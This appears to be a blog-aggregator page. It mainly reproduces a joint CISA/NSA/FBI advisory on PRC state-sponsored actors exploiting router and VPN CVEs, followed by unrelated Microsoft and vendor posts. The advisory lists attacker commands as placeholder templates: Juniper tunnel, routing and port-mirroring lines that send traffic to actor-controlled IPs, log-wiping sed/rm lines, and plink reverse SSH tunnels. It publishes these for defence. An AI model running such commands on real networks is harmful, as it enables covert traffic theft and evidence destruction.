People’s Republic of China State-Sponsored Cyber Actors Exploit Network Providers and Devices

This article is contributed. See the original author and article here.

CISA, the National Security Agency (NSA), and the Federal Bureau of Investigation (FBI) have released a joint Cybersecurity Advisory (CSA) to provide information on ways in which People’s Republic of China (PRC) state-sponsored cyber actors continue to exploit publicly known vulnerabilities in order to establish a broad network of compromised infrastructure across public and private sector organizations. The advisory details PRC state-sponsored targeting and compromise of major telecommunications companies and network service providers. It also provides information on the top vulnerabilities associated with network devices routinely exploited by PRC cyber actors since 2020.

CISA, NSA, and the FBI encourage organizations to review People’s Republic of China State-Sponsored Cyber Actors Exploit Network Providers and Devices to learn about PRC tactics, techniques, and procedures and to apply the recommended mitigations. 

People’s Republic of China State-Sponsored Cyber Actors Exploit Network Providers and Devices

This article is contributed. See the original author and article here.

Best Practices
• Apply patches as soon as possible
• Disable unnecessary ports and protocols
• Replace end-of-life infrastructure
• Implement a centralized patch management system

This joint Cybersecurity Advisory describes the ways in which People’s Republic of China (PRC) state-sponsored cyber actors continue to exploit publicly known vulnerabilities in order to establish a broad network of compromised infrastructure. These actors use the network to exploit a wide variety of targets worldwide, including public and private sector organizations. The advisory details the targeting and compromise of major telecommunications companies and network service providers and the top vulnerabilities—primarily Common Vulnerabilities and Exposures (CVEs)—associated with network devices routinely exploited by the cyber actors since 2020.

This joint Cybersecurity Advisory was coauthored by the National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), and the Federal Bureau of Investigation (FBI). It builds on previous NSA, CISA, and FBI reporting to inform federal and state, local, tribal, and territorial (SLTT) government; critical infrastructure (CI), including the Defense Industrial Base (DIB); and private sector organizations about notable trends and persistent tactics, techniques, and procedures (TTPs).

Entities can mitigate the vulnerabilities listed in this advisory by applying the available patches to their systems, replacing end-of-life infrastructure, and implementing a centralized patch management program.

NSA, CISA, and the FBI urge U.S. and allied governments, CI, and private industry organizations to apply the recommendations listed in the Mitigations section and Appendix A: Vulnerabilities to increase their defensive posture and reduce the risk of PRC state-sponsored malicious cyber actors affecting their critical networks.

For more information on PRC state-sponsored malicious cyber activity, see CISA’s China Cyber Threat Overview and Advisories webpage.

Click here for PDF.

Common vulnerabilities exploited by People’s Republic of China state-sponsored cyber actors

PRC state-sponsored cyber actors readily exploit vulnerabilities to compromise unpatched network devices. Network devices, such as Small Office/Home Office (SOHO) routers and Network Attached Storage (NAS) devices, serve as additional access points to route command and control (C2) traffic and act as midpoints to conduct network intrusions on other entities. Over the last few years, a series of high-severity vulnerabilities for network devices provided cyber actors with the ability to regularly exploit and gain access to vulnerable infrastructure devices. In addition, these devices are often overlooked by cyber defenders, who struggle to maintain and keep pace with routine software patching of Internet-facing services and endpoint devices.

Since 2020, PRC state-sponsored cyber actors have conducted widespread campaigns to rapidly exploit publicly identified security vulnerabilities, also known as common vulnerabilities and exposures (CVEs). This technique has allowed the actors to gain access into victim accounts using publicly available exploit code against virtual private network (VPN) services [T1133]  or public facing applications [T1190]—without using their own distinctive or identifying malware—so long as the actors acted before victim organizations updated their systems. 

PRC state-sponsored cyber actors typically conduct their intrusions by accessing compromised servers called hop points from numerous China-based Internet Protocol (IP) addresses resolving to different Chinese Internet service providers (ISPs). The cyber actors typically obtain the use of servers by leasing remote access directly or indirectly from hosting providers. They use these servers to register and access operational email accounts, host C2 domains, and interact with victim networks. Cyber actors use these hop points as an obfuscation technique when interacting with victim networks.

These cyber actors are also consistently evolving and adapting tactics to bypass defenses. NSA, CISA, and the FBI have observed state-sponsored cyber actors monitoring network defenders’ accounts and actions, and then modifying their ongoing campaign as needed to remain undetected. Cyber actors have modified their infrastructure and toolsets immediately following the release of information related to their ongoing campaigns. PRC state-sponsored cyber actors often mix their customized toolset with publicly available tools, especially by leveraging tools that are native to the network environment, to obscure their activity by blending into the noise or normal activity of a network.

NSA, CISA, and the FBI consider the common vulnerabilities and exposures (CVEs) listed in Table 1 to be the network device CVEs most frequently exploited by PRC state-sponsored cyber actors since 2020.

 

Table 1: Top network device CVEs exploited by PRC state-sponsored cyber actors

Vendor                                       CVE                                  Vulnerability Type
Cisco CVE-2018-0171 Remote Code Execution
CVE-2019-15271 RCE
CVE-2019-1652 RCE
Citrix CVE-2019-19781 RCE
DrayTek CVE-2020-8515 RCE
D-Link CVE-2019-16920 RCE
Fortinet CVE-2018-13382 Authentication Bypass
MikroTik CVE-2018-14847 Authentication Bypass
Netgear CVE-2017-6862 RCE
Pulse CVE-2019-11510 Authentication Bypass
CVE-2021-22893 RCE
QNAP CVE-2019-7192 Privilege Elevation
CVE-2019-7193 Remote Inject
CVE-2019-7194 XML Routing Detour Attack
CVE-2019-7195 XML Routing Detour Attack
Zyxel CVE-2020-29583 Authentication Bypass

Telecommunications and network service provider targeting

PRC state-sponsored cyber actors frequently utilize open-source tools for reconnaissance and vulnerability scanning. The actors have utilized open-source router specific software frameworks, RouterSploit and RouterScan [T1595.002], to identify makes, models, and known vulnerabilities for further investigation and exploitation. The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices. RouterScan is an open-source tool that easily allows for the scanning of IP addresses for vulnerabilities. These tools enable exploitation of SOHO and other routers manufactured by major industry providers, including Cisco, Fortinet, and MikroTik.

Upon gaining an initial foothold into a telecommunications organization or network service provider, PRC state-sponsored cyber actors have identified critical users and infrastructure including systems critical to maintaining the security of authentication, authorization, and accounting. After identifying a critical Remote Authentication Dial-In User Service (RADIUS) server, the cyber actors gained credentials to access the underlying Structured Query Language (SQL) database [T1078] and utilized SQL commands to dump the credentials [T1555], which contained both cleartext and hashed passwords for user and administrative accounts. 

Having gained credentials from the RADIUS server, PRC state-sponsored cyber actors used those credentials with custom automated scripts to authenticate to a router via Secure Shell (SSH), execute router commands, and save the output [T1119]. These scripts targeted Cisco and Juniper routers and saved the output of the executed commands, including the current configuration of each router. After successfully capturing the command output, these configurations were exfiltrated off network to the actor’s infrastructure [TA0010]. The cyber actors likely used additional scripting to further automate the exploitation of medium to large victim networks, where routers and switches are numerous, to gather massive numbers of router configurations that would be necessary to successfully manipulate traffic within the network.

Armed with valid accounts and credentials from the compromised RADIUS server and the router configurations, the cyber actors returned to the network and used their access and knowledge to successfully authenticate and execute router commands to surreptitiously route [T1599], capture [T1020.001], and exfiltrate traffic out of the network to actor-controlled infrastructure. 

While other manufacturers likely have similar commands, the cyber actors executed the following commands on a Juniper router to perform initial tunnel configuration for eventual exfiltration out of the network:

set chassis fpc <slot number> pic <user defined value> tunnel-services bandwidth <user defined value>
set chassis network-services all-ethernet
set interfaces <interface-id> unit <unit number> tunnel source <local network IP address>
set interfaces <interface-id> unit <unit number> tunnel destination <actor controlled IP address>
 

After establishing the tunnel, the cyber actors configured the local interface on the device and updated the routing table to route traffic to actor-controlled infrastructure.

set interfaces <interface-id> unit <unit number> family inet address <local network IP address subnet>
set routing-options static route <local network IP address> next-hop <actor controlled IP address>
 

PRC state-sponsored cyber actors then configured port mirroring to copy all traffic to the local interface, which was subsequently forwarded through the tunnel out of the network to actor-controlled infrastructure. 

set firewall family inet filter <filter name> term <filter variable> then port-mirror
set forwarding-options port-mirroring input rate 1
set forwarding-options port-mirroring family inet output interface <interface-id> next-hop <local network IP address>
set forwarding-options port-mirroring family inet output no-filter-check
set interfaces <interface-id> unit <unit number> family inet filter input <filter name>
set interfaces <interface-id> unit <unit number> family inet filter output <filter name>
 

Having completed their configuration changes, the cyber actors often modified and/or removed local log files to destroy evidence of their activity to further obfuscate their presence and evade detection.

sed -i -e ‘/<REGEX>/d’ <log filepath 1>
sed -i -e ‘/<REGEX>/d’ <log filepath 2>
sed -i -e ‘/<REGEX>/d’ <log filepath 3>
rm -f <log filepath 4>
rm -f <log filepath 5>
rm -f <log filepath 6>
 

PRC state-sponsored cyber actors also utilized command line utility programs like PuTTY Link (Plink) to establish SSH tunnels [T1572] between internal hosts and leased virtual private server (VPS) infrastructure. These actors often conducted system network configuration discovery [T1016.001] on these host networks by sending hypertext transfer protocol (HTTP) requests to C2 infrastructure in order to illuminate the external public IP address.

plink.exe –N –R <local port>:<host 1>:<remote port> -pw <user defined password> -batch root@<VPS1> -P <remote SSH port>
plink.exe –N –R <local port>:<host 2>:<remote port> -pw <user defined password> -batch root@<VPS2> -P <remote SSH port>
 

NSA, CISA, and the FBI urge organizations to apply the following recommendations as well as the mitigation and detection recommendations in Appendix A, which are tailored to observed tactics and techniques. While some vulnerabilities have specific additional mitigations below, the following mitigations generally apply:

  • Keep systems and products updated and patched as soon as possible after patches are released [D3-SU] . Consider leveraging a centralized patch management system to automate and expedite the process.
  • Immediately remove or isolate suspected compromised devices from the network [D3-ITF] [D3-OTF].
  • Segment networks to limit or block lateral movement [D3-NI]. 
  • Disable unused or unnecessary network services, ports, protocols, and devices [D3-ACH] [D3-ITF] [D3-OTF]. 
  • Enforce multifactor authentication (MFA) for all users, without exception [D3-MFA]. 
  • Enforce MFA on all VPN connections [D3-MFA]. If MFA is unavailable, enforce password complexity requirements [D3-SPP]. 
  • Implement strict password requirements, enforcing password complexity, changing passwords at a defined frequency, and performing regular account reviews to ensure compliance [D3-SPP].
  • Perform regular data backup procedures and maintain up-to-date incident response and recovery procedures. 
  • Disable external management capabilities and set up an out-of-band management network [D3-NI].
  • Isolate Internet-facing services in a network Demilitarized Zone (DMZ) to reduce the exposure of the internal network [D3-NI].
  • Enable robust logging of Internet-facing services and monitor the logs for signs of compromise [D3-NTA] [D3-PM].
  • Ensure that you have dedicated management systems [D3-PH] and accounts for system administrators. Protect these accounts with strict network policies [D3-UAP].
  • Enable robust logging and review of network infrastructure accesses, configuration changes, and critical infrastructure services performing authentication, authorization, and accounting functions [D3-PM]. 
  • Upon responding to a confirmed incident within any portion of a network, response teams should scrutinize network infrastructure accesses, evaluate potential lateral movement to network infrastructure and implement corrective actions commensurate with their findings.

Resources

Refer to us-cert.cisa.gov/china, https://www.ic3.gov/Home/IndustryAlerts, and https://www.nsa.gov/cybersecurity-guidance for previous reporting on People’s Republic of China state-sponsored malicious cyber activity.

U.S. government and critical infrastructure organizations, should consider signing up for CISA’s cyber hygiene services, including vulnerability scanning, to help reduce exposure to threats.

U.S. Defense Industrial Base (DIB) organizations, should consider signing up for the NSA Cybersecurity Collaboration Center’s DIB Cybersecurity Service Offerings, including Protective Domain Name System (PDNS) services, vulnerability scanning, and threat intelligence collaboration. For more information on eligibility criteria and how to enroll in these services, email dib_defense@cyber.nsa.gov.

Additional References

Contact Information 

To report incidents and anomalous activity or to request incident response resources or technical assistance related to these threats, contact CISA at report@cisa.gov. To report computer intrusion or cybercrime activity related to information found in this advisory, contact your local FBI field office at www.fbi.gov/contact-us/field, or the FBI’s 24/7 Cyber Watch at 855-292-3937 or by email at CyWatch@fbi.gov. For NSA client requirements or general cybersecurity inquiries, contact Cybersecurity_Requests@nsa.gov

Media Inquiries / Press Desk: 

Disclaimer of endorsement

The information and opinions contained in this document are provided “as is” and without any warranties or guarantees. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government, and this guidance shall not be used for advertising or product endorsement purposes.

Purpose

This advisory was developed by NSA, CISA, and the FBI in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders. 

Appendix A: Vulnerabilities

Table 2: Information on Cisco CVE-2018-0171

 

Table 3: Information on Cisco CVE-2019-15271

                                              Cisco CVE-2019-15271                      CVSS 3.0: 8.8 (High)

Vulnerability Description 

A vulnerability in the web-based management interface of certain Cisco Small Business RV Series Routers could allow an authenticated, remote attacker to execute arbitrary commands with root privileges. The attacker must have either a valid credential or an active session token. The vulnerability is due to lack of input validation of the HTTP payload. An attacker could exploit this vulnerability by sending a malicious HTTP request to the web-based management interface of the targeted device. A successful exploit could allow the attacker to execute commands with root privileges.

Recommended Mitigations 

  • Cisco has released free software updates that address the vulnerability described in this advisory.
  • Cisco fixed this vulnerability in firmware releases 4.2.3.10 and later for the Cisco RV042 Dual WAN VPN Router and RV042G Dual Gigabit WAN VPN Router.
  • Administrators can reduce the attack surface by disabling the Remote Management feature if there is no operational requirement to use it. Note that the feature is disabled by default.
Detection Methods 

Vulnerable Technologies and Versions 

This vulnerability affects the following Cisco Small Business RV Series Routers if they are running a firmware release earlier than 4.2.3.10:

  • RV016 Multi-WAN VPN Router
  • RV042 Dual WAN VPN Router
  • RV042G Dual Gigabit WAN VPN Router
  • RV082 Dual WAN VPN Router

References 

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20191106-sbrv-cmd-x

 

Table 4: Information on Cisco CVE-2019-1652

 

Table 5: Information on Citrix CVE-2019-19781

                                                   Citrix CVE-2019-19781          CVSS 3.0: 9.8 (Critical)

Vulnerability Description 

An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal.

Recommended Mitigations 

  • Implement the appropriate refresh according to the vulnerability details outlined by vendor: Citrix: Mitigation Steps for CVE-2019-19781. 
  • If possible, only allow the VPN to communicate with known Internet Protocol (IP) addresses (allow-list).
Detection Methods 

  • CISA has developed a free detection tool for this vulnerability: cisa.gov/check-cve-2019-19781: Test a host for susceptibility to CVE-2019-19781.
  • Nmap developed a script that can be used with the port scanning engine: CVE-2019-19781 – Critix ADC Path Traversal #1893.
  • Citrix also developed a free tool for detecting compromises of Citrix ADC Appliances related to CVE-2019-19781: Citrix / CVE-2019-19781: IOC Scanner for CVE-2019-19781.
  • CVE-2019-19781 is commonly exploited to install web shell malware. The National Security Agency (NSA) provides guidance on detecting and preventing web shell malware at https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF and signatures at https://github.com/nsacyber/Mitigating-Web-Shells.

Vulnerable Technologies and Versions 

The vulnerability affects the following Citrix product versions on all supported platforms:

  • Citrix ADC and Citrix Gateway version 13.0 all supported builds before 13.0.47.24
  • NetScaler ADC and NetScaler Gateway version 12.1 all supported builds before 12.1.55.18
  • NetScaler ADC and NetScaler Gateway version 12.0 all supported builds before 12.0.63.13
  • NetScaler ADC and NetScaler Gateway version 11.1 all supported builds before 11.1.63.15
  • NetScaler ADC and NetScaler Gateway version 10.5 all supported builds before 10.5.70.12
  • Citrix SD-WAN WANOP appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO all supported software release builds before 10.2.6b and 11.0.3b 

References 

https://support.citrix.com/article/CTX267027

 

Table 6: Information on DrayTek CVE-2020-8515

                                                 DrayTek CVE-2020-8515          CVSS 3.0: 9.8 (Critical)

Vulnerability Description 

DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices allow remote code execution as root (without authentication) via shell metacharacters to the cgi-bin/mainfunction.cgi URI. This issue has been fixed in Vigor3900/2960/300B v1.5.1.

Recommended Mitigations 

  • Users of affected models should upgrade to 1.5.1 firmware or later as soon as possible, the updated firmware addresses this issue.
  • Disable the remote access on your router if you don’t need it.
  • Disable remote access (admin) and SSL VPN. The ACL does not apply to SSL VPN connections (Port 443) so you should also temporarily disable SSL VPN until you have updated the firmware.
  • Always back up your config before doing an upgrade.
  • After upgrading, check that the web interface now shows the new firmware version.
  • Enable syslog logging for monitoring if there are abnormal events. 
Detection Methods 

  • Check that no additional remote access profiles (VPN dial-in, teleworker or LAN to LAN) or admin users (for router admin) have been added.
  • Check if any ACL (Access Control Lists) have been altered.
Vulnerable Technologies and Versions 

  • This vulnerability affects the Vigor3900/2960/300B before firmware version 1.5.1.

References 

https://draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515)/
http://packetstormsecurity.com/files/156979/DrayTek-Vigor2960-Vigor3900-Vigor300B-Remote-Command-Execution.html
https://sku11army.blogspot.com/2020/01/draytek-unauthenticated-rce-in-draytek.html

 

Table 7: Information on D-Link CVE-2019-16920

                                                   D-Link CVE-2019-16920          CVSS 3.0: 9.8 (Critical)

Vulnerability Description 

Unauthenticated remote code execution occurs in D-Link products such as DIR-655C, DIR-866L, DIR-652, and DHP-1565. The issue occurs when the attacker sends an arbitrary input to a “PingTest” device common gateway interface that could lead to common injection. An attacker who successfully triggers the command injection could achieve full system compromise. Later, it was independently found that these are also affected: DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825.

Recommended Mitigations 

  • Recommendation is to replace affected devices with ones that are currently supported by the vendor. End-of-life devices should not be used.
Detection Methods 

  • HTTP packet inspection to look for arbitrary input to the “ping_test” command 
Vulnerable Technologies and Versions 

  • DIR DIR-655C, DIR-866L, DIR-652, DHP-1565, DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-82

References 

https://www.kb.cert.org/vuls/id/766427
https://fortiguard.com/zeroday/FG-VD-19-117
https://medium.com/@80vul/determine-the-device-model-affected-by-cve-2019-16920-by-zoomeye-bf6fec7f9bb3
https://www.seebug.org/vuldb/ssvid-98079

 

Table 8: Information on Fortinet CVE-2018-13382

                                                     Fortinet CVE-2018-13382            CVSS 3.0: 7.5 (High)

Vulnerability Description 

An Improper Authorization vulnerability in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.8 and 5.4.1 to 5.4.10 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to modify the password of an SSL VPN web portal user via specially crafted HTTP requests.

Recommended Mitigations 

  • Upgrade to FortiOS versions 5.4.11, 5.6.9, 6.0.5, 6.2.0 or above and/or upgrade to FortiProxy version 1.2.9 or above or version 2.0.1 or above.
  • SSL VPN users with local authentication can mitigate the impact by enabling Two-Factor Authentication (2FA).
  • Migrate SSL VPN user authentication from local to remote (LDAP or RADIUS).
  • Totally disable the SSL-VPN service (both web-mode and tunnel-mode) by applying the following CLI commands: config vpn ssl settings, unset source-interface, end.
Detection Methods 

  • HTTP packet inspection to look for specially crafted packets containing the magic key for the SSL VPN password modification

Vulnerable Technologies and Versions

This vulnerability affects the following products: 

  • Fortinet FortiOS 6.0.0 to 6.0.4
  • Fortinet FortiOS 5.6.0 to 5.6.8
  • Fortinet FortiOS 5.4.1 to 5.4.10
  • Fortinet FortiProxy 2.0.0
  • Fortinet FortiProxy 1.2.8 and below
  • Fortinet FortiProxy 1.1.6 and below
  • Fortinet FortiProxy 1.0.7 and below

FortiOS products are vulnerable only if the SSL VPN service (web-mode or tunnel-mode) is enabled and users with local authentication.

References 

https://fortiguard.com/psirt/FG-IR-18-389
https://fortiguard.com/advisory/FG-IR-18-389
https://www.fortiguard.com/psirt/FG-IR-20-231

 

Table 9: Information on Mikrotik CVE-2018-14847

                                            Mikrotik CVE-2018-14847            CVSS 3.0: 9.1 (Critical)

Vulnerability Description 

MikroTik RouterOS through 6.42 allows unauthenticated remote attackers to read arbitrary files and remote authenticated attackers to write arbitrary files due to a directory traversal vulnerability in the WinBox interface.

Recommended Mitigations 

  • Upgrade WinBox and RouterOS and change passwords
  • Firewall the WinBox port from the public interface and from untrusted networks
Detection Methods 

  • Use export command to see all your configuration and inspect for any abnormalities, such as unknown SOCKS proxy settings and scripts.

Vulnerable Technologies and Versions 

This vulnerability affected the following MikroTik products:

  • All bugfix releases from 6.30.1 to 6.40.7
  • All current releases from 6.29 to 6.42
  • All RC releases from 6.29rc1 to 6.43rc3

References

https://blog.mikrotik.com/security/winbox-vulnerability.html

 

Table 10: Information on Netgear CVE-2017-6862

 

Table 11: Information on Pulse CVE-2019-11510

                                              Pulse CVE-2019-11510                   CVSS 3.0: 10 (Critical)

Vulnerability Description 

In Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4, an unauthenticated remote attacker can send a specially crafted URI to perform an arbitrary file reading vulnerability. 

Recommended Mitigations 

  • Upgrade to the latest Pulse Secure VPN.
  • Stay alert to any scheduled tasks or unknown files/executables.
  • Create detection/protection mechanisms that respond on directory traversal (/../../../) attempts to read local system files.

Detection Methods 

  • CISA developed a tool to help determine if IOCs exist in the log files of a Pulse Secure VPN Appliance for CVE-2019-11510: cisa.gov/check-your-pulse.
  • Nmap developed a script that can be used with the port scanning engine: http-vuln-cve2019- 11510.nse #1708.

Vulnerable Technologies and Versions 

This vulnerability affects the following Pulse Connect Secure products:

  • 9.0R1 to 9.0R3.3
  • 8.3R1 to 8.3R7
  • 8.2R1 to 8.2R12

References 

https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/

 

Table 12: Information on Pulse CVE-2021-22893

 

Table 13: Information on QNAP CVE-2019-7192

                                                  QNAP CVE-2019-7192               CVSS 3.0: 9.8 (Critical)

Vulnerability Description 

This improper access control vulnerability allows remote attackers to gain unauthorized access to the system. To fix these vulnerabilities, QNAP recommend updating Photo Station to their latest versions.

Recommended Mitigations 

Update Photo Station to versions: 

  • QTS 4.4.1 Photo Station 6.0.3 and later
  • QTS 4.3.4-QTS 4.4.0 Photo Station 5.7.10 and later
  • QTS 4.3.0-QTS 4.3.3 Photo Station 5.4.9 and later
  • QTS 4.2.6 Photo Station 5.2.11 and later 
Detection Methods 

Vulnerable Technologies and Versions 

This vulnerability affects QNAP Photo Station versions 5.2.11, 5.4.9, 5.7.10, and 6.0.3 or earlier.

References 

https://www.qnap.com/zh-tw/security-advisory/nas-201911-25
http://packetstormsecurity.com/files/157857/QNAP-QTS-And-Photo-Station-6.0.3-Remote-Command-Execution.html

 

Table 14: Information on QNAP CVE- 2019-7193

 

Table 15: Information on QNAP CVE-2019-7194

                                               QNAP CVE-2019-7194             CVSS 3.0: 9.8 (Critical)

Vulnerability Description

This external control of file name or path vulnerability allows remote attackers to access or modify system files. To fix the vulnerability, QNAP recommend updating Photo Station to their latest versions.

Recommended Mitigations 

Update Photo Station to versions: 

  • QTS 4.4.1 Photo Station 6.0.3 and later
  • QTS 4.3.4-QTS 4.4.0 Photo Station 5.7.10 and later
  • QTS 4.3.0-QTS 4.3.3 Photo Station 5.4.9 and later
  • QTS 4.2.6 Photo Station 5.2.11 and later
Detection Methods 

Vulnerable Technologies and Versions 

This vulnerability affects QNAP Photo Station versions 5.2.11, 5.4.9, 5.7.10, and 6.0.3 or earlier.

References 

https://www.qnap.com/zh-tw/security-advisory/nas-201911-25 
http://packetstormsecurity.com/files/157857/QNAP-QTS-And-Photo-Station-6.0.3-Remote-Command-Execution.html

 

Table 16: Information on QNAP CVE-2019-7195

                                             QNAP CVE-2019-7195                   CVSS 3.0: 9.8 (Critical)

Vulnerability Description 

This external control of file name or path vulnerability allows remote attackers to access or modify system files. To fix the vulnerability, QNAP recommend updating Photo Station to their latest versions.

Recommended Mitigations 

Update Photo Station to versions: 

  • QTS 4.4.1 Photo Station 6.0.3 and later
  • QTS 4.3.4-QTS 4.4.0 Photo Station 5.7.10 and later
  • QTS 4.3.0-QTS 4.3.3 Photo Station 5.4.9 and later
  • QTS 4.2.6 Photo Station 5.2.11 and later
Detection Methods 

Vulnerable Technologies and Versions 

This vulnerability affects QNAP Photo Station versions 5.2.11, 5.4.9, 5.7.10, and 6.0.3 or earlier.

References 

https://www.qnap.com/zh-tw/security-advisory/nas-201911-25
http://packetstormsecurity.com/files/157857/QNAP-QTS-And-Photo-Station-6.0.3-Remote-Command-Execution.html

Table 17: Information on Zyxel CVE-2020-29583

Experiencing Data Latency+Loss for Log Analytics – 06/07 – Resolved

This article is contributed. See the original author and article here.

Final Update: Tuesday, 07 June 2022 17:22 UTC

We’ve confirmed that all systems are back to normal with no customer impact as of 6/7, 15:55 UTC. Our logs show the incident started on 6/7, 14:00 UTC and that during the 2 hours that it took to resolve the issue 100% of customers in Australia Central region would have experienced data latency and/or data loss while publishing logs to their workspace

  • Root Cause: The failure was due to change that got deployed and was rolled back
  • Incident Timeline: 1 Hour & 55 minutes – 6/7, 14:00 UTC through 6/7, 15:55 UTC
We understand that customers rely on Azure Log Analytics as a critical service and apologize for any impact this incident caused.

-Robin Paul

Enrich your B2B accounts with email and meeting data for better engagement

Enrich your B2B accounts with email and meeting data for better engagement

This article is contributed. See the original author and article here.

Knowing how your sales organization engages with your B2B customers can help you spot changes in communication patterns and understand the state of your accounts and how your organization interacts with them. Microsoft Dynamics 365 Customer Insights brings together transactional, behavioral, and demographic data, Microsoft proprietary audience intelligence, and third-party resources to create enriched, multidimensional profiles for both individual consumers (B2C) and business accounts (B2B). Data enrichment using aggregated email and meeting insights from Microsoft 365 offers even more information to help you engage with your customers more effectively.

The value of data enrichment for engagement

There are endless ways to use customer engagement insights. For B2B environments, information about organizations or companies and their related contacts can be used on its own or combined with other business data previously ingested into Dynamics 365 Customer Insights. For example, you can create a segment of accounts that have not had any meetings or emails with your organization in the last 60 days. Engage and reactivate those stale accounts using a customer journey orchestration platform like Dynamics 365 Marketing.

Here is another example, one of our favorites. You can create a measure defined as the ratio between the combined time your sales team spends in meetings with an account and the anticipated revenue from the account. Use that measure to easily identify accounts that have the largest mismatch between effort and revenue. With that insight, you can make informed choices about how much time your organization spends with those accounts.

How to enrich your account profiles with engagement data

To get started, add your data sources to Customer Insights and create your unified business accounts and related contact records.

Next, set up your enrichment options to use data from Microsoft Office 365:

  1. Select the email addresses for which Office 365 data will be aggregated.
  2. Review and consent to use your organization’s aggregated data in Customer Insights data enrichment.
  3. Run the enrichment process, or let the system run the enrichment automatically as part of a scheduled refresh.

After the enrichment has finished, you can view the results, including the number of enriched customers and the number of processed emails and meetings:

Screenshot of the Dynamics 365 Customer Insights customer engagement enrichment overview page.

All data is aggregated at the account level. A system-calculated engagement score of 0 to 100 is assigned to every account. The engagement score captures the engagement your organization has with this account relative to all your other accounts.

You can view account engagement, including the engagement score, on the individual customer cards. Also shown are the total number of emails and meetings over the past year, along with charts that show the email and meeting history. These views make it easy to spot any changes in communication patterns over time:

Screenshot of the Dynamics 365 Customer Insights customer engagement card.

Data enrichment captures more than 15 data points, including the average duration of meetings, the number of people associated with the account who attended the meetings, and the number of days since the last email and the last meeting. Check out the documentation for the full list of aggregated data that account enrichment provides.

Next steps

Learn how your company can gain the most comprehensive view of your customers by visiting Dynamics 365 Customer Insights.

Read how you can enrich your customer profiles with engagement data in the Customer Insights documentation.

Sign up for a free Dynamics 365 Customer Insights trial to experience how you can create the ultimate 360-degree view of your customers.

The post Enrich your B2B accounts with email and meeting data for better engagement appeared first on Microsoft Dynamics 365 Blog.

Brought to you by Dr. Ware, Microsoft Office 365 Silver Partner, Charleston SC.

Owl Labs Releases Security Updates for Meeting Owl Pro and Whiteboard Owl

This article is contributed. See the original author and article here.

Owl Labs has released security updates to address a vulnerability (CVE-2022-31460) in Meeting Owl Pro and Whiteboard Owl. An attacker could exploit this vulnerability to obtain sensitive information. 

CISA encourages users and administrators to review the Owl Labs security advisories for Meeting Owl Pro and Whiteboard Owl and update to Version 5.4.1.4. 

Introducing Direct Guest Join for expanded capabilities in Microsoft Teams Rooms on Android

Introducing Direct Guest Join for expanded capabilities in Microsoft Teams Rooms on Android

This article is contributed. See the original author and article here.

Within hybrid work, organizations have been forced to adapt and reimagine how people will communicate and collaborate. Even with Microsoft Teams providing innovative solutions to hybrid work challenges, employees can often work with organizations outside of their own and occasionally need to join meetings from third-party meeting providers.



Today, Teams Rooms on Android offers Direct Guest Join, a one-touch experience that allows users to join a third-party online meeting from their Teams Rooms just as easily as they can join meetings hosted in Teams. This experience helps reduce friction when users are joining calls from external partners or clients who may not use the same meeting provider.


Direct Guest Join.png


 


Teams Rooms on Android will initially offer interoperability with Zoom meetings, while Cisco Webex and other third-party partners are coming soon to the Android platform. This experience began to rollout on May 25 for Poly Teams certified devices, with Logitech and Yealink fast following, and additional device manufactures coming soon.



Under the hood
Microsoft partnered with Zoom, Cisco, GoToMeeting, and BlueJeans to create an interoperability experience with Direct Guest Join. Third-party providers like Zoom provide an embedded web experience that temporarily allows Teams Rooms users to join third-party meetings and collaborate more freely. This web experience provides up-to-date software as well as enterprise-grade privacy and security. As this partnership grows, Direct Guest Join will continue to improve with new and exciting functionalities.


 


To learn more about the future of Rooms and its interoperability experience, be on the lookout for a joint webcast between Microsoft and Zoom, with Ilya Bukshteyn, VP of Teams Calling and Devices, and Jeff Smith, Head of Zoom Rooms and Whiteboard.


 


Additional Resources:


Microsoft Build 2022 – Community Ninjas review

Microsoft Build 2022 – Community Ninjas review

This article is contributed. See the original author and article here.

 


Ronen_Ariely_0-1654437683518.png


Hi ninjas and guest,


 


If you expect me to go straight to a technical overview of what was good and what could be better, then you are probably not following me here.
Anyone who is familiar with the Community Ninjas blog, already knows that we love the stories of the community, we like to meet the people behind the stories, we like to bring the community aspects of the technical events, so it’s clear that we could not skip the stories from the Microsoft’s largest annual conference,


The Microsoft Build!


Obviously you can always scroll down to the next story.


So, let’s start with the story behind this post, followed by the stories of the community.


 


What is Microsoft Build (from my perspective)?


According to Wikipedia Microsoft Build is an annual conference event held by Microsoft, aimed at software engineers and web developers… “aimed developers” is what I remembered, but if you are database administrator or just working with SQL Server, then this year was a bit different. SQL Server 2022 public beta was released and first announced. The SQL Server team presented multiple sessions showing some of the new features everyone can now examine. If you remember for example, then SQL Server 2019 was released during the Ignite conference which more fit for such.


 


